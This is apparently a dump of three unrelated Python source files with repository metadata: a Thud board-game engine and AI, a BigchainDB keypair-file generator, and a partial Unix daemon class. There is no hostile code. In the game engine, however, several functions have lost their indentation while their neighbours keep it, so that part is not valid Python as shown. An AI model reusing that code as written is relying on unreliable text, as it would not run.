            self.thudstone = self.thudstone & ~Bitboard([ply.origin]) | Bitboard([ply.dest])
def cycle_direction(self):
"""
A generator yielding all 8 outward directions.
"""
for i in [-self.BOARD_WIDTH-1, -self.BOARD_WIDTH, -self.BOARD_WIDTH+1,
self.BOARD_WIDTH-1, self.BOARD_WIDTH, self.BOARD_WIDTH+1,
-1, 1]:
yield i
def get_delta(self, origin, dest):
"""
Determines the general direction of two locations.
Works on all input but does not guarantee precision.
Will return (-1,0,1) x (-1,0,1).
"""
delta_file = (dest[0] > origin[0]) - (dest[0] < origin[0])
delta_rank = (dest[1] > origin[1]) - (dest[1] < origin[1])
return (delta_file, delta_rank)
def delta_to_direction(self, delta):
"""
Translate a general direction (get_delta) into a usable direction
"""
return {
(-1,-1): -self.BOARD_WIDTH-1,
( 0,-1): -self.BOARD_WIDTH,
( 1,-1): -self.BOARD_WIDTH+1,
(-1, 0): -1,
( 0, 0): 0,
( 1, 0): 1,
(-1, 1): self.BOARD_WIDTH-1,
( 0, 1): self.BOARD_WIDTH,
( 1, 1): self.BOARD_WIDTH+1
}[delta]
def get_direction(self, origin, dest):
"""
Readability function to take two locations amd return a discrete direction,
with limited accuracy.
"""
delta = self.get_delta(Ply.position_to_tuple(origin), Ply.position_to_tuple(dest))
return self.delta_to_direction(delta)
def check_if_all(self, seq, token):
"""
Function returns true if all members in seq are of token type.
"""
for i in filter(lambda x: x != token, seq):
return False
return True
def get_range(self, origin, dest):
"""
Returns a list of tokens from and including origin to dest.
"""
direction = self.get_direction(origin, dest)
pc_range = []
for i in range(origin, dest + direction, direction):
pc_range.append(self.token_at(i))
return pc_range
def tokens_adjacent(self, position, token):
"""
Returns a list of a given token adjacent to a position.
"""
capturable = []
for d in filter(lambda x: self.token_at(position+x) == token, \
self.cycle_direction()):
capturable.append(position+d)
return capturable
    def validate_move(self, origin, dest, testmoves=True, testcaps=True):
        """
        Master function--receives two locations and determines validity of
        move/capture.  Checks the origin piece and automatically uses the
        applicable logic for movement and captures.

        Returns a 3-tuple (valid_move, valid_capture, captured_positions).
        """
        def is_materializing(origin, dest):
            """
            If true, the move attempted is to materialize a troll in KLASH
            """
            # A no-op "move" onto an empty classic troll start square on
            # the troll's turn marks a materialization attempt.
            if origin == dest and \
               (len(self.ply_list) % 2 and 'troll') and \
               self.token_at(origin) == 'empty' and \
               origin in self.get_default_positions('troll', 'classic'):
                return True
        def is_dumb(origin, dest):
            """
            If true, the move is invalid under all circumstance and games.
            Exception is is_materializing which must be called prior to this.
            """
            try:
                # Off-board squares, no-op moves, and lines that are neither
                # orthogonal nor exact diagonals are all invalid.
                if not Bitboard([origin]) & self.playable:
                    return True
                elif not Bitboard([dest]) & self.playable:
                    return True
                elif origin == dest:
                    return True
                else:
                    t_origin, t_dest = Ply.position_to_tuple(origin), Ply.position_to_tuple(dest)
                    if t_origin[0] - t_dest[0] and t_origin[1] - t_dest[1]:
                        if abs(t_origin[0] - t_dest[0]) != abs(t_origin[1] - t_dest[1]):
                            return True
            except:
                # Any malformed position counts as invalid.
                return True
        def must_be_jump(position):
            """
            In KVT, if trolls successfully capture,
            trolls may only move again to capture or end turn.
            """
            if self.ply_list and \
               self.ply_list[-1].token == 'troll' and \
               self.ply_list[-1].captured and \
               int(self.trolls[position]):
                return True
        def is_valid_cap_kvt(origin, dest):
            """
            Checks if a capture is valid in KVT.  Returns the list of
            capturable positions (empty list when none).
            """
            capturable = []
            if int(self.dwarfs[origin]):
                # Dwarfs capture by "jumping": empty-troll-dwarf lines
                # adjacent to the destination.
                for i in self.tokens_adjacent(dest, 'troll'):
                    direction = self.get_direction(dest, i)
                    seq = self.get_range(dest, dest + direction + direction)
                    if seq == ['empty', 'troll', 'dwarf']:
                        capturable.append(dest + direction)
                return capturable
            elif int(self.trolls[origin]):
                # Trolls capture the dwarf they hop over.
                if self.get_range(origin, dest) == ['troll', 'dwarf', 'empty']:
                    return [origin + self.get_direction(origin, dest)]
            return []
        def is_valid_cap_normal(origin, dest):
            """
            Checks if a capture is valid in classic/klash.  Returns the
            list of capturable positions (empty list when none).
            """
            verified, capturable = [], []
            if int(self.dwarfs[origin]):
                # Dwarf hurl: landing square holds a troll, and the line
                # behind the thrower is solid dwarfs of sufficient length.
                seq = self.get_range(origin, dest)
                if seq.pop(-1) == 'troll' and seq.pop(0) == 'dwarf':
                    if not len(seq):
                        return [dest]
                    if self.check_if_all(seq, 'empty'):
                        direction = self.get_direction(dest, origin)
                        if is_dumb(origin, origin + direction * len(seq)):
                            return []
                        newseq = self.get_range(origin, origin + direction * len(seq))
                        if self.check_if_all(newseq, 'dwarf'):
                            return [dest]
            elif int(self.trolls[origin]):
                # Troll shove: land on an empty square adjacent to dwarfs,
                # backed by a solid troll line of sufficient length.
                seq = self.get_range(origin, dest)
                if seq.pop(-1) == 'empty' and seq.pop(0) == 'troll':
                    capturable = self.tokens_adjacent(dest, 'dwarf')
                    if not capturable: return []
                    elif not seq: return capturable
                    elif self.check_if_all(seq, 'empty'):
                        direction = self.get_direction(dest, origin)
                        if is_dumb(origin, origin + direction * len(seq)):
                            return []
                        newseq = self.get_range(origin, origin + direction * len(seq))
                        if self.check_if_all(newseq, 'troll'):
                            return capturable
            return []
        def is_valid_move(origin, dest):
            """Performs all logic for all rulesets about movement of pieces"""
            def max_troll_move():
                """Returns the number of moves a troll may make in current ruleset"""
                return {
                    'classic': 1,
                    'klash': 1,
                    'kvt': 3
                }[self.ruleset]
            squares = self.get_range(origin, dest)
            if squares[0] == 'dwarf':
                # Dwarfs slide any distance over empty squares.
                del squares[0]
                if not self.check_if_all(squares, 'empty'):
                    return False
            elif squares[0] == 'troll':
                del squares[0]
                if len(squares) > max_troll_move():
                    return False
                if not self.check_if_all(squares, 'empty'):
                    return False
            elif squares[0] == 'thudstone':
                # Thudstone moves one square and needs 2+ adjacent dwarfs
                # at both origin and destination.
                if not len(squares) == 2 or not squares[1] == 'empty':
                    return False
                count, count2 = 0, 0
                for i in self.cycle_direction():
                    if self.dwarfs[origin+i]:
                        count += 1
                    if self.dwarfs[dest+i]:
                        count2 += 1
                if count < 2 or count2 < 2:
                    return False
            return True
        move, cap = None, None
        # Klash materialization is signalled via the capture slot.
        if self.ruleset == 'klash' and \
           is_materializing(origin, dest):
            return (False, False, [origin])
        if is_dumb(origin, dest):
            return (False, False, [])
        if testmoves:
            move = is_valid_move(origin, dest)
        if testcaps:
            if self.ruleset == 'kvt':
                cap = is_valid_cap_kvt(origin, dest)
            else:
                cap = is_valid_cap_normal(origin, dest)
        # KVT multicapture rule: a troll that just captured may only jump.
        if self.ruleset == 'kvt' and \
           must_be_jump(origin) and \
           not cap:
            return (False, False, [])
        return (move, bool(cap), cap)
    def get_game_outcome(self):
        """Return the winning token name ('dwarf'/'troll') or None if the
        game is still in progress, per the current ruleset."""
        def check_rout(token):
            # True when the given side has no pieces left.
            board = {
                'dwarf': self.dwarfs,
                'troll': self.trolls
            }[token]
            return not board
        def check_mobilized():
            """Iterate through network of dwarfs to see if all are physically connected"""
            def unique(pos_list):
                checked = []
                for i in filter(lambda x: x not in checked, pos_list):
                    checked.append(i)
                return checked
            # Flood-fill from one dwarf across adjacency; fully connected
            # when the fill reaches every dwarf.
            pieces = self.dwarfs.get_bits()
            openset = [next(pieces)]
            closedset = []
            while len(openset):
                closedset.append(openset[0])
                for i in self.tokens_adjacent(openset[0], 'dwarf'):
                    if i not in closedset:
                        openset.append(i)
                del openset[0]
            if len(unique(closedset)) == len(self.dwarfs):
                return True
        def check_thudstone_saved():
            """Dwarf win if thudstone successfuly moved to top of board"""
            goal_squares = list(map(Ply.tuple_to_position, [(6,1),(7,1),(8,1),(9,1),(10,1)]))
            if list(self.thudstone.get_bits())[0] in goal_squares:
                return True
        def check_thudstone_captured():
            """Troll win if thudstone surrounded by 3 trolls"""
            if len(self.tokens_adjacent(list(self.thudstone.get_bits())[0], 'troll')) >= 3:
                return True
        def klash_win_conditions():
            # Troll rout only counts once all six klash trolls have entered.
            if self.turn_to_act() == 'troll' and \
               self.klash_trolls == 6 and \
               check_rout('troll'):
                return 'dwarf'
            elif self.turn_to_act() == 'dwarf' and \
                 check_rout('dwarf'):
                return 'troll'
            elif self.turn_to_act() == 'troll' and \
                 check_mobilized():
                return 'dwarf'
        def classic_win_conditions():
            if self.turn_to_act() == 'troll' and \
               check_rout('troll'):
                return 'dwarf'
            elif self.turn_to_act() == 'dwarf' and \
                 check_rout('dwarf'):
                return 'troll'
        def kvt_win_conditions():
            if self.turn_to_act() == 'troll' and \
               check_rout('troll'):
                return 'dwarf'
            elif self.turn_to_act() == 'dwarf' and \
                 check_rout('dwarf'):
                return 'troll'
            elif check_thudstone_saved():
                return 'dwarf'
            elif self.turn_to_act() == 'dwarf' and \
                 check_thudstone_captured():
                return 'troll'
        if self.ruleset == 'classic':
            return classic_win_conditions()
        elif self.ruleset == 'kvt':
            return kvt_win_conditions()
        elif self.ruleset == 'klash':
            return klash_win_conditions()
def make_set(self, direction, distance, destinations):
"""Converts bitboard-data points into usable ply-pairs"""
pairs = []
for i in destinations:
#origin, destination, direction
pairs.append((i-(direction*distance), i, direction))
return pairs
    def find_moves(self, token):
        """
        Yields all possible moves for ALL pieces of a token.
        Bitboards hold all the logic necessary, so validate_move
        is not needed here.
        """
        def max_movement():
            nonlocal token
            # Maximum straight-line distance per token type.
            return {
                'troll': 1,
                'dwarf': 15,
                'thudstone': 0
            }[token]
        all_moves = []
        max_dist = max_movement()
        for d in self.cycle_direction():
            shift = {
                'troll': copy.deepcopy(self.trolls),
                'dwarf': copy.deepcopy(self.dwarfs),
                'thudstone': copy.deepcopy(self.thudstone),
            }[token]
            for dist in range(1, max_dist+1):
                # Slide every piece one more step in direction d; keep only
                # landings on empty, playable squares.  Positive offsets
                # shift right, negative shift left.
                if d > 0:
                    shift = (shift >> d) & ~self.occupied_squares() & self.playable
                elif d < 0:
                    shift = (shift << abs(d)) & ~self.occupied_squares() & self.playable
                moves = self.make_set(d, dist, frozenset(shift.get_bits()))
                if not moves: break
                for i in moves:
                    yield Ply(token, i[0], i[1], [])
    def find_caps(self, token):
        """
        Yields all possible captures for ALL pieces of a token.
        Due to the nature of capturing, this function also executes
        validate_move to remove bitboard positives that are illegal.
        """
        all_moves = []
        for d in self.cycle_direction():
            shift = {
                'troll': copy.deepcopy(self.trolls),
                'dwarf': copy.deepcopy(self.dwarfs),
                'thudstone': copy.deepcopy(self.thudstone),
            }[token]
            for dist in range(1, 7):
                if token == 'troll':
                    # Trolls shove onto empty playable squares; adjacency
                    # captures are confirmed by validate_move.
                    if d > 0:
                        shift = (shift >> d) & ~self.occupied_squares() & self.playable
                    elif d < 0:
                        shift = (shift << abs(d)) & ~self.occupied_squares() & self.playable
                    moves = self.make_set(d, dist, frozenset(shift.get_bits()))
                    if not moves: break
                    for i in moves:
                        result = self.validate_move(i[0], i[1], False, True)
                        if result[1]:
                            yield Ply(token, i[0], i[1], result[2])
                elif token == 'dwarf':
                    # Dwarfs hurl onto troll-occupied (or empty) squares;
                    # only troll landings can be captures.
                    if d > 0:
                        shift = (shift >> d) & self.playable & (~self.occupied_squares() | self.trolls)
                    elif d < 0:
                        shift = (shift << abs(d)) & self.playable & (~self.occupied_squares() | self.trolls)
                    moves = self.make_set(d, dist, frozenset(shift.get_bits()))
                    if not moves: break
                    for i in moves:
                        if int(self.trolls[i[1]]):
                            result = self.validate_move(i[0], i[1], False, True)
                            if result[1]:
                                yield Ply(token, i[0], i[1], result[2])
    def find_setups(self, token, other_map=None):
        """
        Yields all possible setups (supporting plies that complete a
        future capture line) for ALL pieces of a token.
        Dwarf strategy minimally relies on this, and therefore it has not
        been fully implemented; the dwarf path requires `other_map`
        (a bitboard of interesting target squares).
        """
        def pieces_within_reach(dest, pcs_locked):
            """
            Determines if pieces are availble to move into deficit areas
            that are not already relied on for the capture
            """
            nonlocal token
            if token == 'troll':
                available = set(self.trolls.get_bits()).difference(pcs_locked)
            elif token == 'dwarf':
                available = set(self.dwarfs.get_bits()).difference(pcs_locked)
            reachable = []
            for i in available:
                if self.validate_move(i, dest, True, False)[0]:
                    reachable.append(i)
            return reachable
        def find_valid_solutions(ply):
            """
            Checks each potential setup and determines if piece
            may be added to front or back of line to be valid
            """
            nonlocal token
            valid_support_plies, support_ready = [], []
            if token == 'troll':
                # The path to the target must be clear.
                squares = self.get_range(ply.origin, ply.dest)
                squares.pop(0)
                squares.pop(-1)
                if not self.check_if_all(squares, 'empty'):
                    return []
                # Count the contiguous troll line behind the shover.
                direction = self.get_direction(ply.dest, ply.origin)
                iterator = ply.origin
                while int(self.trolls[iterator]):
                    support_ready.append(iterator)
                    iterator += direction
                deficiency = len(squares) - len(support_ready)
                #if line is short one, support required is ONE of the two -- back or front
                if deficiency == 1:
                    support_reqd = [support_ready[0] - direction, support_ready[-1] + direction]
                #if line is short two, support required MUST be front, else requires too many moves to care
                elif deficiency == 2:
                    support_reqd = [support_ready[0] - direction]
                else:
                    return []
                for i in support_reqd:
                    support_verified = pieces_within_reach(i, support_ready)
                    for p in support_verified:
                        valid_support_plies.append(Ply('troll', p, i, []))
            elif token == 'dwarf':
                # A hurl line of 3 needs one supporter behind; a line of 4
                # needs one supporter in front.
                squares = self.get_range(ply.origin, ply.dest)
                if len(squares) == 3:
                    direction = self.get_direction(ply.dest, ply.origin)
                    support_reqd = ply.origin + direction
                    support_verified = pieces_within_reach(support_reqd, [ply.origin])
                elif len(squares) == 4:
                    direction = self.get_direction(ply.origin, ply.dest)
                    support_reqd = ply.origin + direction
                    support_verified = pieces_within_reach(support_reqd, [ply.origin])
                else:
                    return []
                for p in support_verified:
                    valid_support_plies.append(Ply('dwarf', p, support_reqd, []))
            return valid_support_plies
        def find_potential_setups():
            """
            Locate pieces that have potential attacks in each direction.
            Eliminates lines that require more than 1 pc to complete.
            """
            nonlocal token
            nonlocal other_map
            for d in self.cycle_direction():
                shift = {
                    'troll': copy.deepcopy(self.trolls),
                    'dwarf': copy.deepcopy(self.dwarfs),
                    'thudstone': copy.deepcopy(self.thudstone),
                }[token]
                for dist in range(1, 15):
                    if token == 'troll':
                        # Slide toward dwarf-occupied or empty squares.
                        if d > 0:
                            shift = Bitboard.create(shift.value >> d) & self.playable & (~self.occupied_squares() | self.dwarfs)
                        elif d < 0:
                            shift = Bitboard.create(shift.value << abs(d)) & self.playable & (~self.occupied_squares() | self.dwarfs)
                        moves = self.make_set(d, dist, frozenset(shift.get_bits()))
                        if not moves: break
                        for i in moves:
                            if int(self.dwarfs[i[1]]):
                                yield Ply('troll', i[0], i[1], [])
                    if token == 'dwarf':
                        # Dwarf setups only make sense against a target map.
                        if not other_map: return
                        if d > 0:
                            shift = (shift >> d) & self.playable & (~self.occupied_squares() | other_map)
                        elif d < 0:
                            shift = (shift << abs(d)) & self.playable & (~self.occupied_squares() | other_map)
                        moves = self.make_set(d, dist, frozenset(shift.get_bits()))
                        if not moves: break
                        for i in moves:
                            if int(other_map[i[1]]):
                                yield Ply(token, i[0], i[1], [])
        for i in find_potential_setups():
            for v in find_valid_solutions(i):
                yield v
class AIEngine(threading.Thread):
def __init__(self, board):
self.board = copy.deepcopy(board)
self.moves = []
self.threats = []
self.setups = []
def apply(self, ply_list):
"""Apply a ply to a board"""
for p in ply_list:
self.board.apply_ply(p)
self.board.ply_list.append(p)
    def score(self, token):
        """Scoring function to determine favorability of the position for
        `token` (higher is better).

        A troll is weighted 4x a dwarf; pieces currently threatened with
        capture are penalized at the same weights.
        """
        if token == 'troll':
            score = len(self.board.trolls) * 4 - len(self.board.dwarfs)
            score -= self.filter_threatened_pieces('troll') * 4
        else:
            score = len(self.board.dwarfs) - len(self.board.trolls) * 4
            score -= self.filter_threatened_pieces('dwarf')
        return score
    def filter_adjacent_threats(self, token):
        """
        Identifies enemies that are adjacent to each other and finds all
        captures to eliminate this threat.  This logic *should* be called
        first, e.g., trolls will lose 4 pts immediately if unattended.
        """
        def unique(positions):
            """Removes duplicates in list"""
            checked = []
            for i in filter(lambda x: x not in checked, positions):
                checked.append(i)
            return checked
        adjacent_threats, solutions = [], []
        if token == 'troll':
            # Every dwarf adjacent to any troll is an immediate threat.
            for t in self.board.trolls.get_bits():
                adjacent_threats.extend(self.board.tokens_adjacent(t, 'dwarf'))
            adjacent_threats = unique(adjacent_threats)
        elif token == 'dwarf':
            # Dwarf-side handling intentionally not implemented.
            pass
        # Keep any known capture ply that removes a threatening piece.
        for j in adjacent_threats:
            for t in self.threats:
                if j in t.captured:
                    solutions.append(t)
        return solutions
def filter_capture_destinations(self, ply_list):
def unique(pos_list):
checked = []
for i in filter(lambda x: x not in checked, pos_list):
checked.append(i)
return checked
dest_positions = []
for p in ply_list:
dest_positions.append(p.dest)
return unique(dest_positions)
    def find_line_blocks(self):
        """
        Checks if a dwarf can be placed at the front of a troll line
        to effectively stop a shove.  Considers the adjacent blocking
        square as well as 1-off, which helps reduce the chances of a
        non-line troll from eliminating the dwarf without interrupting
        the line.
        """
        empties = set()
        for ply in self.board.find_caps('troll'):
            shove_direction = self.board.get_direction(ply.origin, ply.dest)
            opposite_direction = self.board.get_direction(ply.dest, ply.origin)
            # Only consider genuine lines: three trolls stacked behind the
            # shover (the for/else fires when the loop completes unbroken).
            for i in range(3):
                if self.board.token_at(ply.origin + (opposite_direction * i)) != 'troll':
                    break
            else:
                empties.add(ply.origin + shove_direction)
                empties.add(ply.origin + shove_direction + shove_direction)
        available_blockers = list(self.filter_dwarfs_can_reach(empties))
        best_blockers = self.filter_farthest_dwarfs(available_blockers, 0.1)
        return best_blockers
def filter_threatened_pieces(self, friendly_token):
"""Counts the number of pieces that can be captured next turn hypothetically."""
def is_threatened(pos):
"""Cycles opposing token to verify capture is possible of given pos."""
if self.board.trolls[pos]:
for i in self.board.dwarfs.get_bits():
if self.board.validate_move(i, pos, False, True)[1]:
return True
elif self.board.dwarfs[pos]:
for i in self.board.trolls.get_bits():
direction = self.get_direction(i, pos)
if self.board.validate_move(i, i + direction, False, True)[1]:
return True
pieces = {
'troll': self.board.trolls,
'dwarf': self.board.dwarfs
}[friendly_token]
count = 0
for i in pieces.get_bits():
if is_threatened(i):
count += 1
return count
    def nonoptimal_troll_moves(self):
        """Makes a move in a semi-educated fashion: step the troll(s)
        nearest a dwarf one square toward it."""
        def alternate_direction(general_direction):
            """
            If location is occupied, choose a direction
            with at least one kept vector.
            This may never be execute, as it can occur
            ONLY if a troll cannot move due to thudstone.
            """
            candidates = []
            significant_vector_f = general_direction[0] or 0
            significant_vector_r = general_direction[1] or 0
            if significant_vector_f and significant_vector_r:
                candidates.append((significant_vector_f,0))
                candidates.append((0,significant_vector_r))
            elif significant_vector_f:
                candidates.append((significant_vector_f,-1))
                candidates.append((significant_vector_f,1))
            elif significant_vector_r:
                candidates.append((-1,significant_vector_r))
                candidates.append((1,significant_vector_r))
            return random.choice(candidates)
        # Argmin-collect over all troll/dwarf pairs: reset the candidate
        # list whenever a strictly closer pair is found, collect every
        # pair matching the current minimum distance.
        lowest = 100
        for t in self.board.trolls.get_bits():
            for d in self.board.dwarfs.get_bits():
                hypotenuse = Ply.calc_pythagoras(t, d)
                if hypotenuse < lowest:
                    lowest = hypotenuse
                    candidates = []
                if hypotenuse == lowest:
                    delta = self.board.get_delta(Ply.position_to_tuple(t), \
                                                 Ply.position_to_tuple(d))
                    direction = self.board.delta_to_direction(delta)
                    # Sidestep when the direct square is occupied.
                    while self.board.token_at(t + direction) != 'empty':
                        delta = alternate_direction(delta)
                        direction = self.board.delta_to_direction(delta)
                    candidates.append(Ply('troll', t, t + direction, []))
        return candidates
def filter_dwarfs_can_reach(self, dense_spots):
"""
Given a set of desirable locations for dwarfs,
find which plies will satisfy this move
"""
for d in dense_spots:
for m in self.moves:
if d == m.dest:
yield m
def filter_farthest_dwarfs(self, ply_list, variance=.4):
"""
Filter out dwarfs that are near, and keep only those that are far,
so that flocking does not consist of dwarfs moving 1/2 squares only.
"""
farthest = 0
candidates = []
for i in ply_list:
farthest = max(farthest, Ply.calc_pythagoras(i.origin, i.dest))
if farthest <= math.sqrt(2):
return []
for i in ply_list:
if Ply.calc_pythagoras(i.origin,i.dest) >= farthest * (1-variance):
candidates.append(i)
return candidates
    def filter_best(self, token, candidates, variance_pct=0):
        """
        Score each candidate ply on a scratch board and return a random
        choice among those within variance_pct of the best score; returns
        a None-filled Ply when there are no candidates.
        """
        for p in candidates:
            scratch = AIEngine(self.board)
            scratch.apply((p,))
            p.score = scratch.score(token)
        candidates = sorted(candidates, key=lambda v: v.score, reverse=True)
        # NOTE(review): the cutoff multiplies the best score, which inverts
        # the tolerance when the best score is negative — confirm intended.
        top = list(filter(lambda p: p.score >= candidates[0].score * (1-variance_pct), candidates))
        if top:
            return random.choice(top)
        return Ply(None,None,None,None)
    @staticmethod
    def predict_future(board, firstply, lookahead, token):
        """
        Apply `firstply` to a scratch board, let the AI play `lookahead`
        further replies, and return the resulting score for `token`.
        """
        global ai
        b = AIEngine(board)
        b.apply((firstply,))
        for i in range(1, lookahead+1):
            try:
                # calculate_best_move publishes its choice as ai.decision.
                AIEngine.calculate_best_move(b.board, b.board.turn_to_act(), 0)
            except NoMoveException:
                # A side with no moves ends the projection early.
                break
            b.apply((ai.decision,))
        return b.score(token)
@staticmethod
def select_best_future(board, plies, lookahead, token):
"""
Takes a list of plies and determines out the most favorable
"""
best_score = -101
best_ply = None
for i, ply in enumerate(plies):
score = AIEngine.predict_future(board, \
ply, \
lookahead, \
token)
if score > best_score:
best_score = score
best_ply = ply
return best_ply
    @staticmethod
    def calculate_best_move(board, token, lookahead=0):
        """
        Takes a board position and calculates the best move for a token,
        publishing the chosen ply as `ai.decision` (thread-local).
        Can also be used to lookahead x moves in conjunction with
        predict_future.  Raises NoMoveException when `token` cannot move.
        """
        def dest_more_dense(imap, ply):
            # True when the ply moves toward higher influence-map density.
            if imap[ply.dest] > imap[ply.origin]:
                return True
            return False
        global ai
        best_cap, best_setup, best_move = None, None, None
        b = AIEngine(board)
        if not len(b.board.dwarfs): raise NoMoveException('dwarf')
        elif not len(b.board.trolls): raise NoMoveException('troll')
        if token == 'troll':
            ai_log.info('TROLL')
            ai_log.info('turn: %d', len(b.board.ply_list) / 2)
            b.threats = list(b.board.find_caps(token))
            b.setups = list(b.board.find_setups(token))
            # Immediate threats (adjacent dwarfs) take priority.
            immediate_threats = b.filter_adjacent_threats(token)
            if immediate_threats:
                ai.decision = b.filter_best(token, immediate_threats)
                ai_log.info('save %i %s', ai.decision.score, ai.decision or 'x')
            else:
                # Otherwise project captures/setups; fall back to stepping
                # toward the nearest dwarf.
                tsb = AIEngine.select_best_future(b.board, itertools.chain(b.threats, b.setups), 0, token)
                if tsb:
                    ai.decision = tsb
                else:
                    ai.decision = b.filter_best(token, b.nonoptimal_troll_moves())
            ai_log.info('# threats: %i', len(b.threats))
            ai_log.debug('%s', ', '.join(str(s) for s in b.threats))
            ai_log.info('# setups: %i', len(b.setups))
            ai_log.debug('%s', ', '.join(str(s) for s in b.setups))
            ai_log.info(' T: %i d: %i\n', len(b.board.trolls) * 4, len(b.board.dwarfs))
        elif token == 'dwarf':
            ai_log.info('DWARF')
            ai_log.info('turn: %d', len(b.board.ply_list) / 2)
            b.threats = list(b.board.find_caps(token))
            ai.decision = b.filter_best(token, b.threats)
            ai_log.info('best cap %i %s', ai.decision.score, ai.decision or 'x')
            if not ai.decision:
                # No capture available: weigh setups, shove-blocks, and
                # influence-map flocking moves.
                troll_cd = b.filter_capture_destinations(list(b.board.find_caps('troll')))
                b.setups = list(b.board.find_setups(token, Bitboard(troll_cd)))
                b.moves = list(b.board.find_moves(token))
                b.blocks = list(b.find_line_blocks())
                best_setup = b.filter_best(token, b.filter_farthest_dwarfs(b.setups))
                tsb = AIEngine.select_best_future(b.board, \
                                                  itertools.chain(b.threats, b.setups, b.blocks), \
                                                  lookahead, \
                                                  token)
                imap = InfluenceMap(b.board.dwarfs, b.board.trolls)
                empties_adjacent = []
                # Widen the density threshold until a reachable flocking
                # destination is found.
                for i in [.05, .15, .25]:
                    for d in imap.highest(i):
                        empties_adjacent.extend(b.board.tokens_adjacent(d, 'empty'))
                    candidates = list(b.filter_dwarfs_can_reach(empties_adjacent))
                    candidates = b.filter_farthest_dwarfs(candidates)
                    if not candidates:
                        continue
                    else:
                        best_move = b.filter_best(token, candidates)
                        break
                if tsb:
                    ai.decision = AIEngine.select_best_future(b.board, \
                                                              [tsb, best_move], \
                                                              lookahead, \
                                                              token)
                elif best_move:
                    ai.decision = best_move
                else:
                    ai.decision = next(b.board.find_moves('dwarf'))
            ai_log.info('# threats: %i', len(list(b.threats)))
            ai_log.debug('%s', ', '.join(str(s) for s in b.threats))
            ai_log.info('# setups: %i', len(b.setups))
            ai_log.debug('%s', ', '.join(str(s) for s in b.setups))
            ai_log.info('# moves: %i', len(b.moves))
            #ai_log.debug('%s', ', '.join(str(s) for s in b.moves))
            ai_log.info(' T: %i d: %i\n', len(b.board.trolls) * 4, len(b.board.dwarfs))
        if not ai.decision:
            raise NoMoveException(token)
# Thread-local scratchpad: calculate_best_move publishes its chosen ply as
# ai.decision, read back by the caller on the same thread.
ai = threading.local()
| {
"repo_name": "hexparrot/thudgame",
"path": "thud.py",
"copies": "1",
"size": "40073",
"license": "mit",
"hash": 7544303567110820000,
"line_mean": 38.6369930762,
"line_max": 134,
"alpha_frac": 0.4864622065,
"autogenerated": false,
"ratio": 4.026223249271577,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5012685455771576,
"avg_score": null,
"num_lines": null
} |
"""A Python 3 script to write a file with a specified number
of keypairs, using bigchaindb.crypto.generate_key_pair()
The written file is always named keypairs.py and it should be
interpreted as a Python 2 script.
Usage:
$ python3 write_keypairs_file.py num_pairs
Using the list in other Python scripts:
# in a Python 2 script:
from keypairs import keypairs_list
# keypairs_list is a list of (sk, pk) tuples
# sk = signing key (private key)
# pk = verifying key (public key)
"""
import argparse
from bigchaindb import crypto
# Parse the command-line arguments
desc = 'Write a set of keypairs to keypairs.py'
parser = argparse.ArgumentParser(description=desc)
parser.add_argument('num_pairs',
help='number of keypairs to write',
type=int)
args = parser.parse_args()
num_pairs = int(args.num_pairs)
# Generate and write the keypairs to keypairs.py
print('Writing {} keypairs to keypairs.py...'.format(num_pairs))
with open('keypairs.py', 'w') as f:
f.write('# -*- coding: utf-8 -*-\n')
f.write('"""A set of keypairs for use in deploying\n')
f.write('BigchainDB servers with a predictable set of keys.\n')
f.write('"""\n')
f.write('\n')
f.write('from __future__ import unicode_literals\n')
f.write('\n')
f.write('keypairs_list = [')
for pair_num in range(num_pairs):
keypair = crypto.generate_key_pair()
spacer = '' if pair_num == 0 else ' '
f.write("{}('{}',\n '{}'),\n".format(
spacer, keypair[0], keypair[1]))
f.write(' ]\n')
print('Done.')
| {
"repo_name": "charitychain/Charitychain",
"path": "Simplechaindb/clusterdeploy/write_keypairs_file.py",
"copies": "1",
"size": "1603",
"license": "apache-2.0",
"hash": 3639801397304456700,
"line_mean": 31.7142857143,
"line_max": 67,
"alpha_frac": 0.6375545852,
"autogenerated": false,
"ratio": 3.417910447761194,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9555465032961193,
"avg_score": 0,
"num_lines": 49
} |
# A Python3 version of process.py. Eventually, this should replace process.py.
class Daemon(object):
    """
    A generic daemon class (Python 3).

    Usage: subclass the Daemon class and override the run() method.
    The daemon records its PID in `pidfile` and, unless `redirect_output`
    is False, re-points stdin/stdout/stderr at the given paths after
    daemonizing.
    """
    def __init__(self, pidfile, redirect_output = True, stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
        # Paths used to replace the standard streams once daemonized.
        self.stdin = stdin
        self.stdout = stdout
        self.stderr = stderr
        self.pidfile = pidfile
        self.debug = False
        self.redirect_output = redirect_output
    def daemonize(self):
        """
        do the UNIX double-fork magic, see Stevens' "Advanced
        Programming in the UNIX Environment" for details (ISBN 0201563177)
        http://www.erlenstar.demon.co.uk/unix/faq_2.html#SEC16
        """
        try:
            pid = os.fork()
            if pid > 0:
                # exit first parent
                sys.exit(0)
        except OSError as e:
            sys.stderr.write("fork #1 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)
        # decouple from parent environment
        os.chdir("/")
        os.setsid()
        os.umask(0)
        # do second fork
        try:
            pid = os.fork()
            if pid > 0:
                # exit from second parent
                sys.exit(0)
        except OSError as e:
            sys.stderr.write("fork #2 failed: %d (%s)\n" % (e.errno, e.strerror))
            sys.exit(1)
        # Redirect standard file descriptors for the live webserver.
        if self.redirect_output:
            sys.stdout.flush()
            sys.stderr.flush()
            # Py3 fix: the Python 2 ``file()`` builtin no longer exists;
            # use open().  '1' keeps stdout/stderr line-buffered.
            si = open(self.stdin, 'r')
            so = open(self.stdout, 'w', 1)
            se = open(self.stderr, 'w', 1)
            os.dup2(si.fileno(), sys.stdin.fileno())
            os.dup2(so.fileno(), sys.stdout.fileno())
            os.dup2(se.fileno(), sys.stderr.fileno())
        # Arrange for pidfile cleanup on interpreter exit, then record our PID.
        atexit.register(self.delpid)
        self.writepid()
    def writepid(self):
        """Write the current process id to the pidfile."""
        # Py3 fix: open() instead of file(); context manager closes the handle.
        with open(self.pidfile, 'w+') as f:
            f.write("%s\n" % os.getpid())
    def delpid(self):
        """Remove the pidfile."""
        os.remove(self.pidfile)
    def start(self):
        """
        Start the daemon
        """
        # Check for a pidfile to see if the daemon already runs
        pid = None
        if os.path.exists(self.pidfile):
            try:
                with open(self.pidfile, 'r') as pf:
                    pid = int(pf.read().strip())
            except IOError:
                pid = None
        if pid:
            message = "pidfile %s already exist. Daemon already running?\n"
            sys.stderr.write(message % self.pidfile)
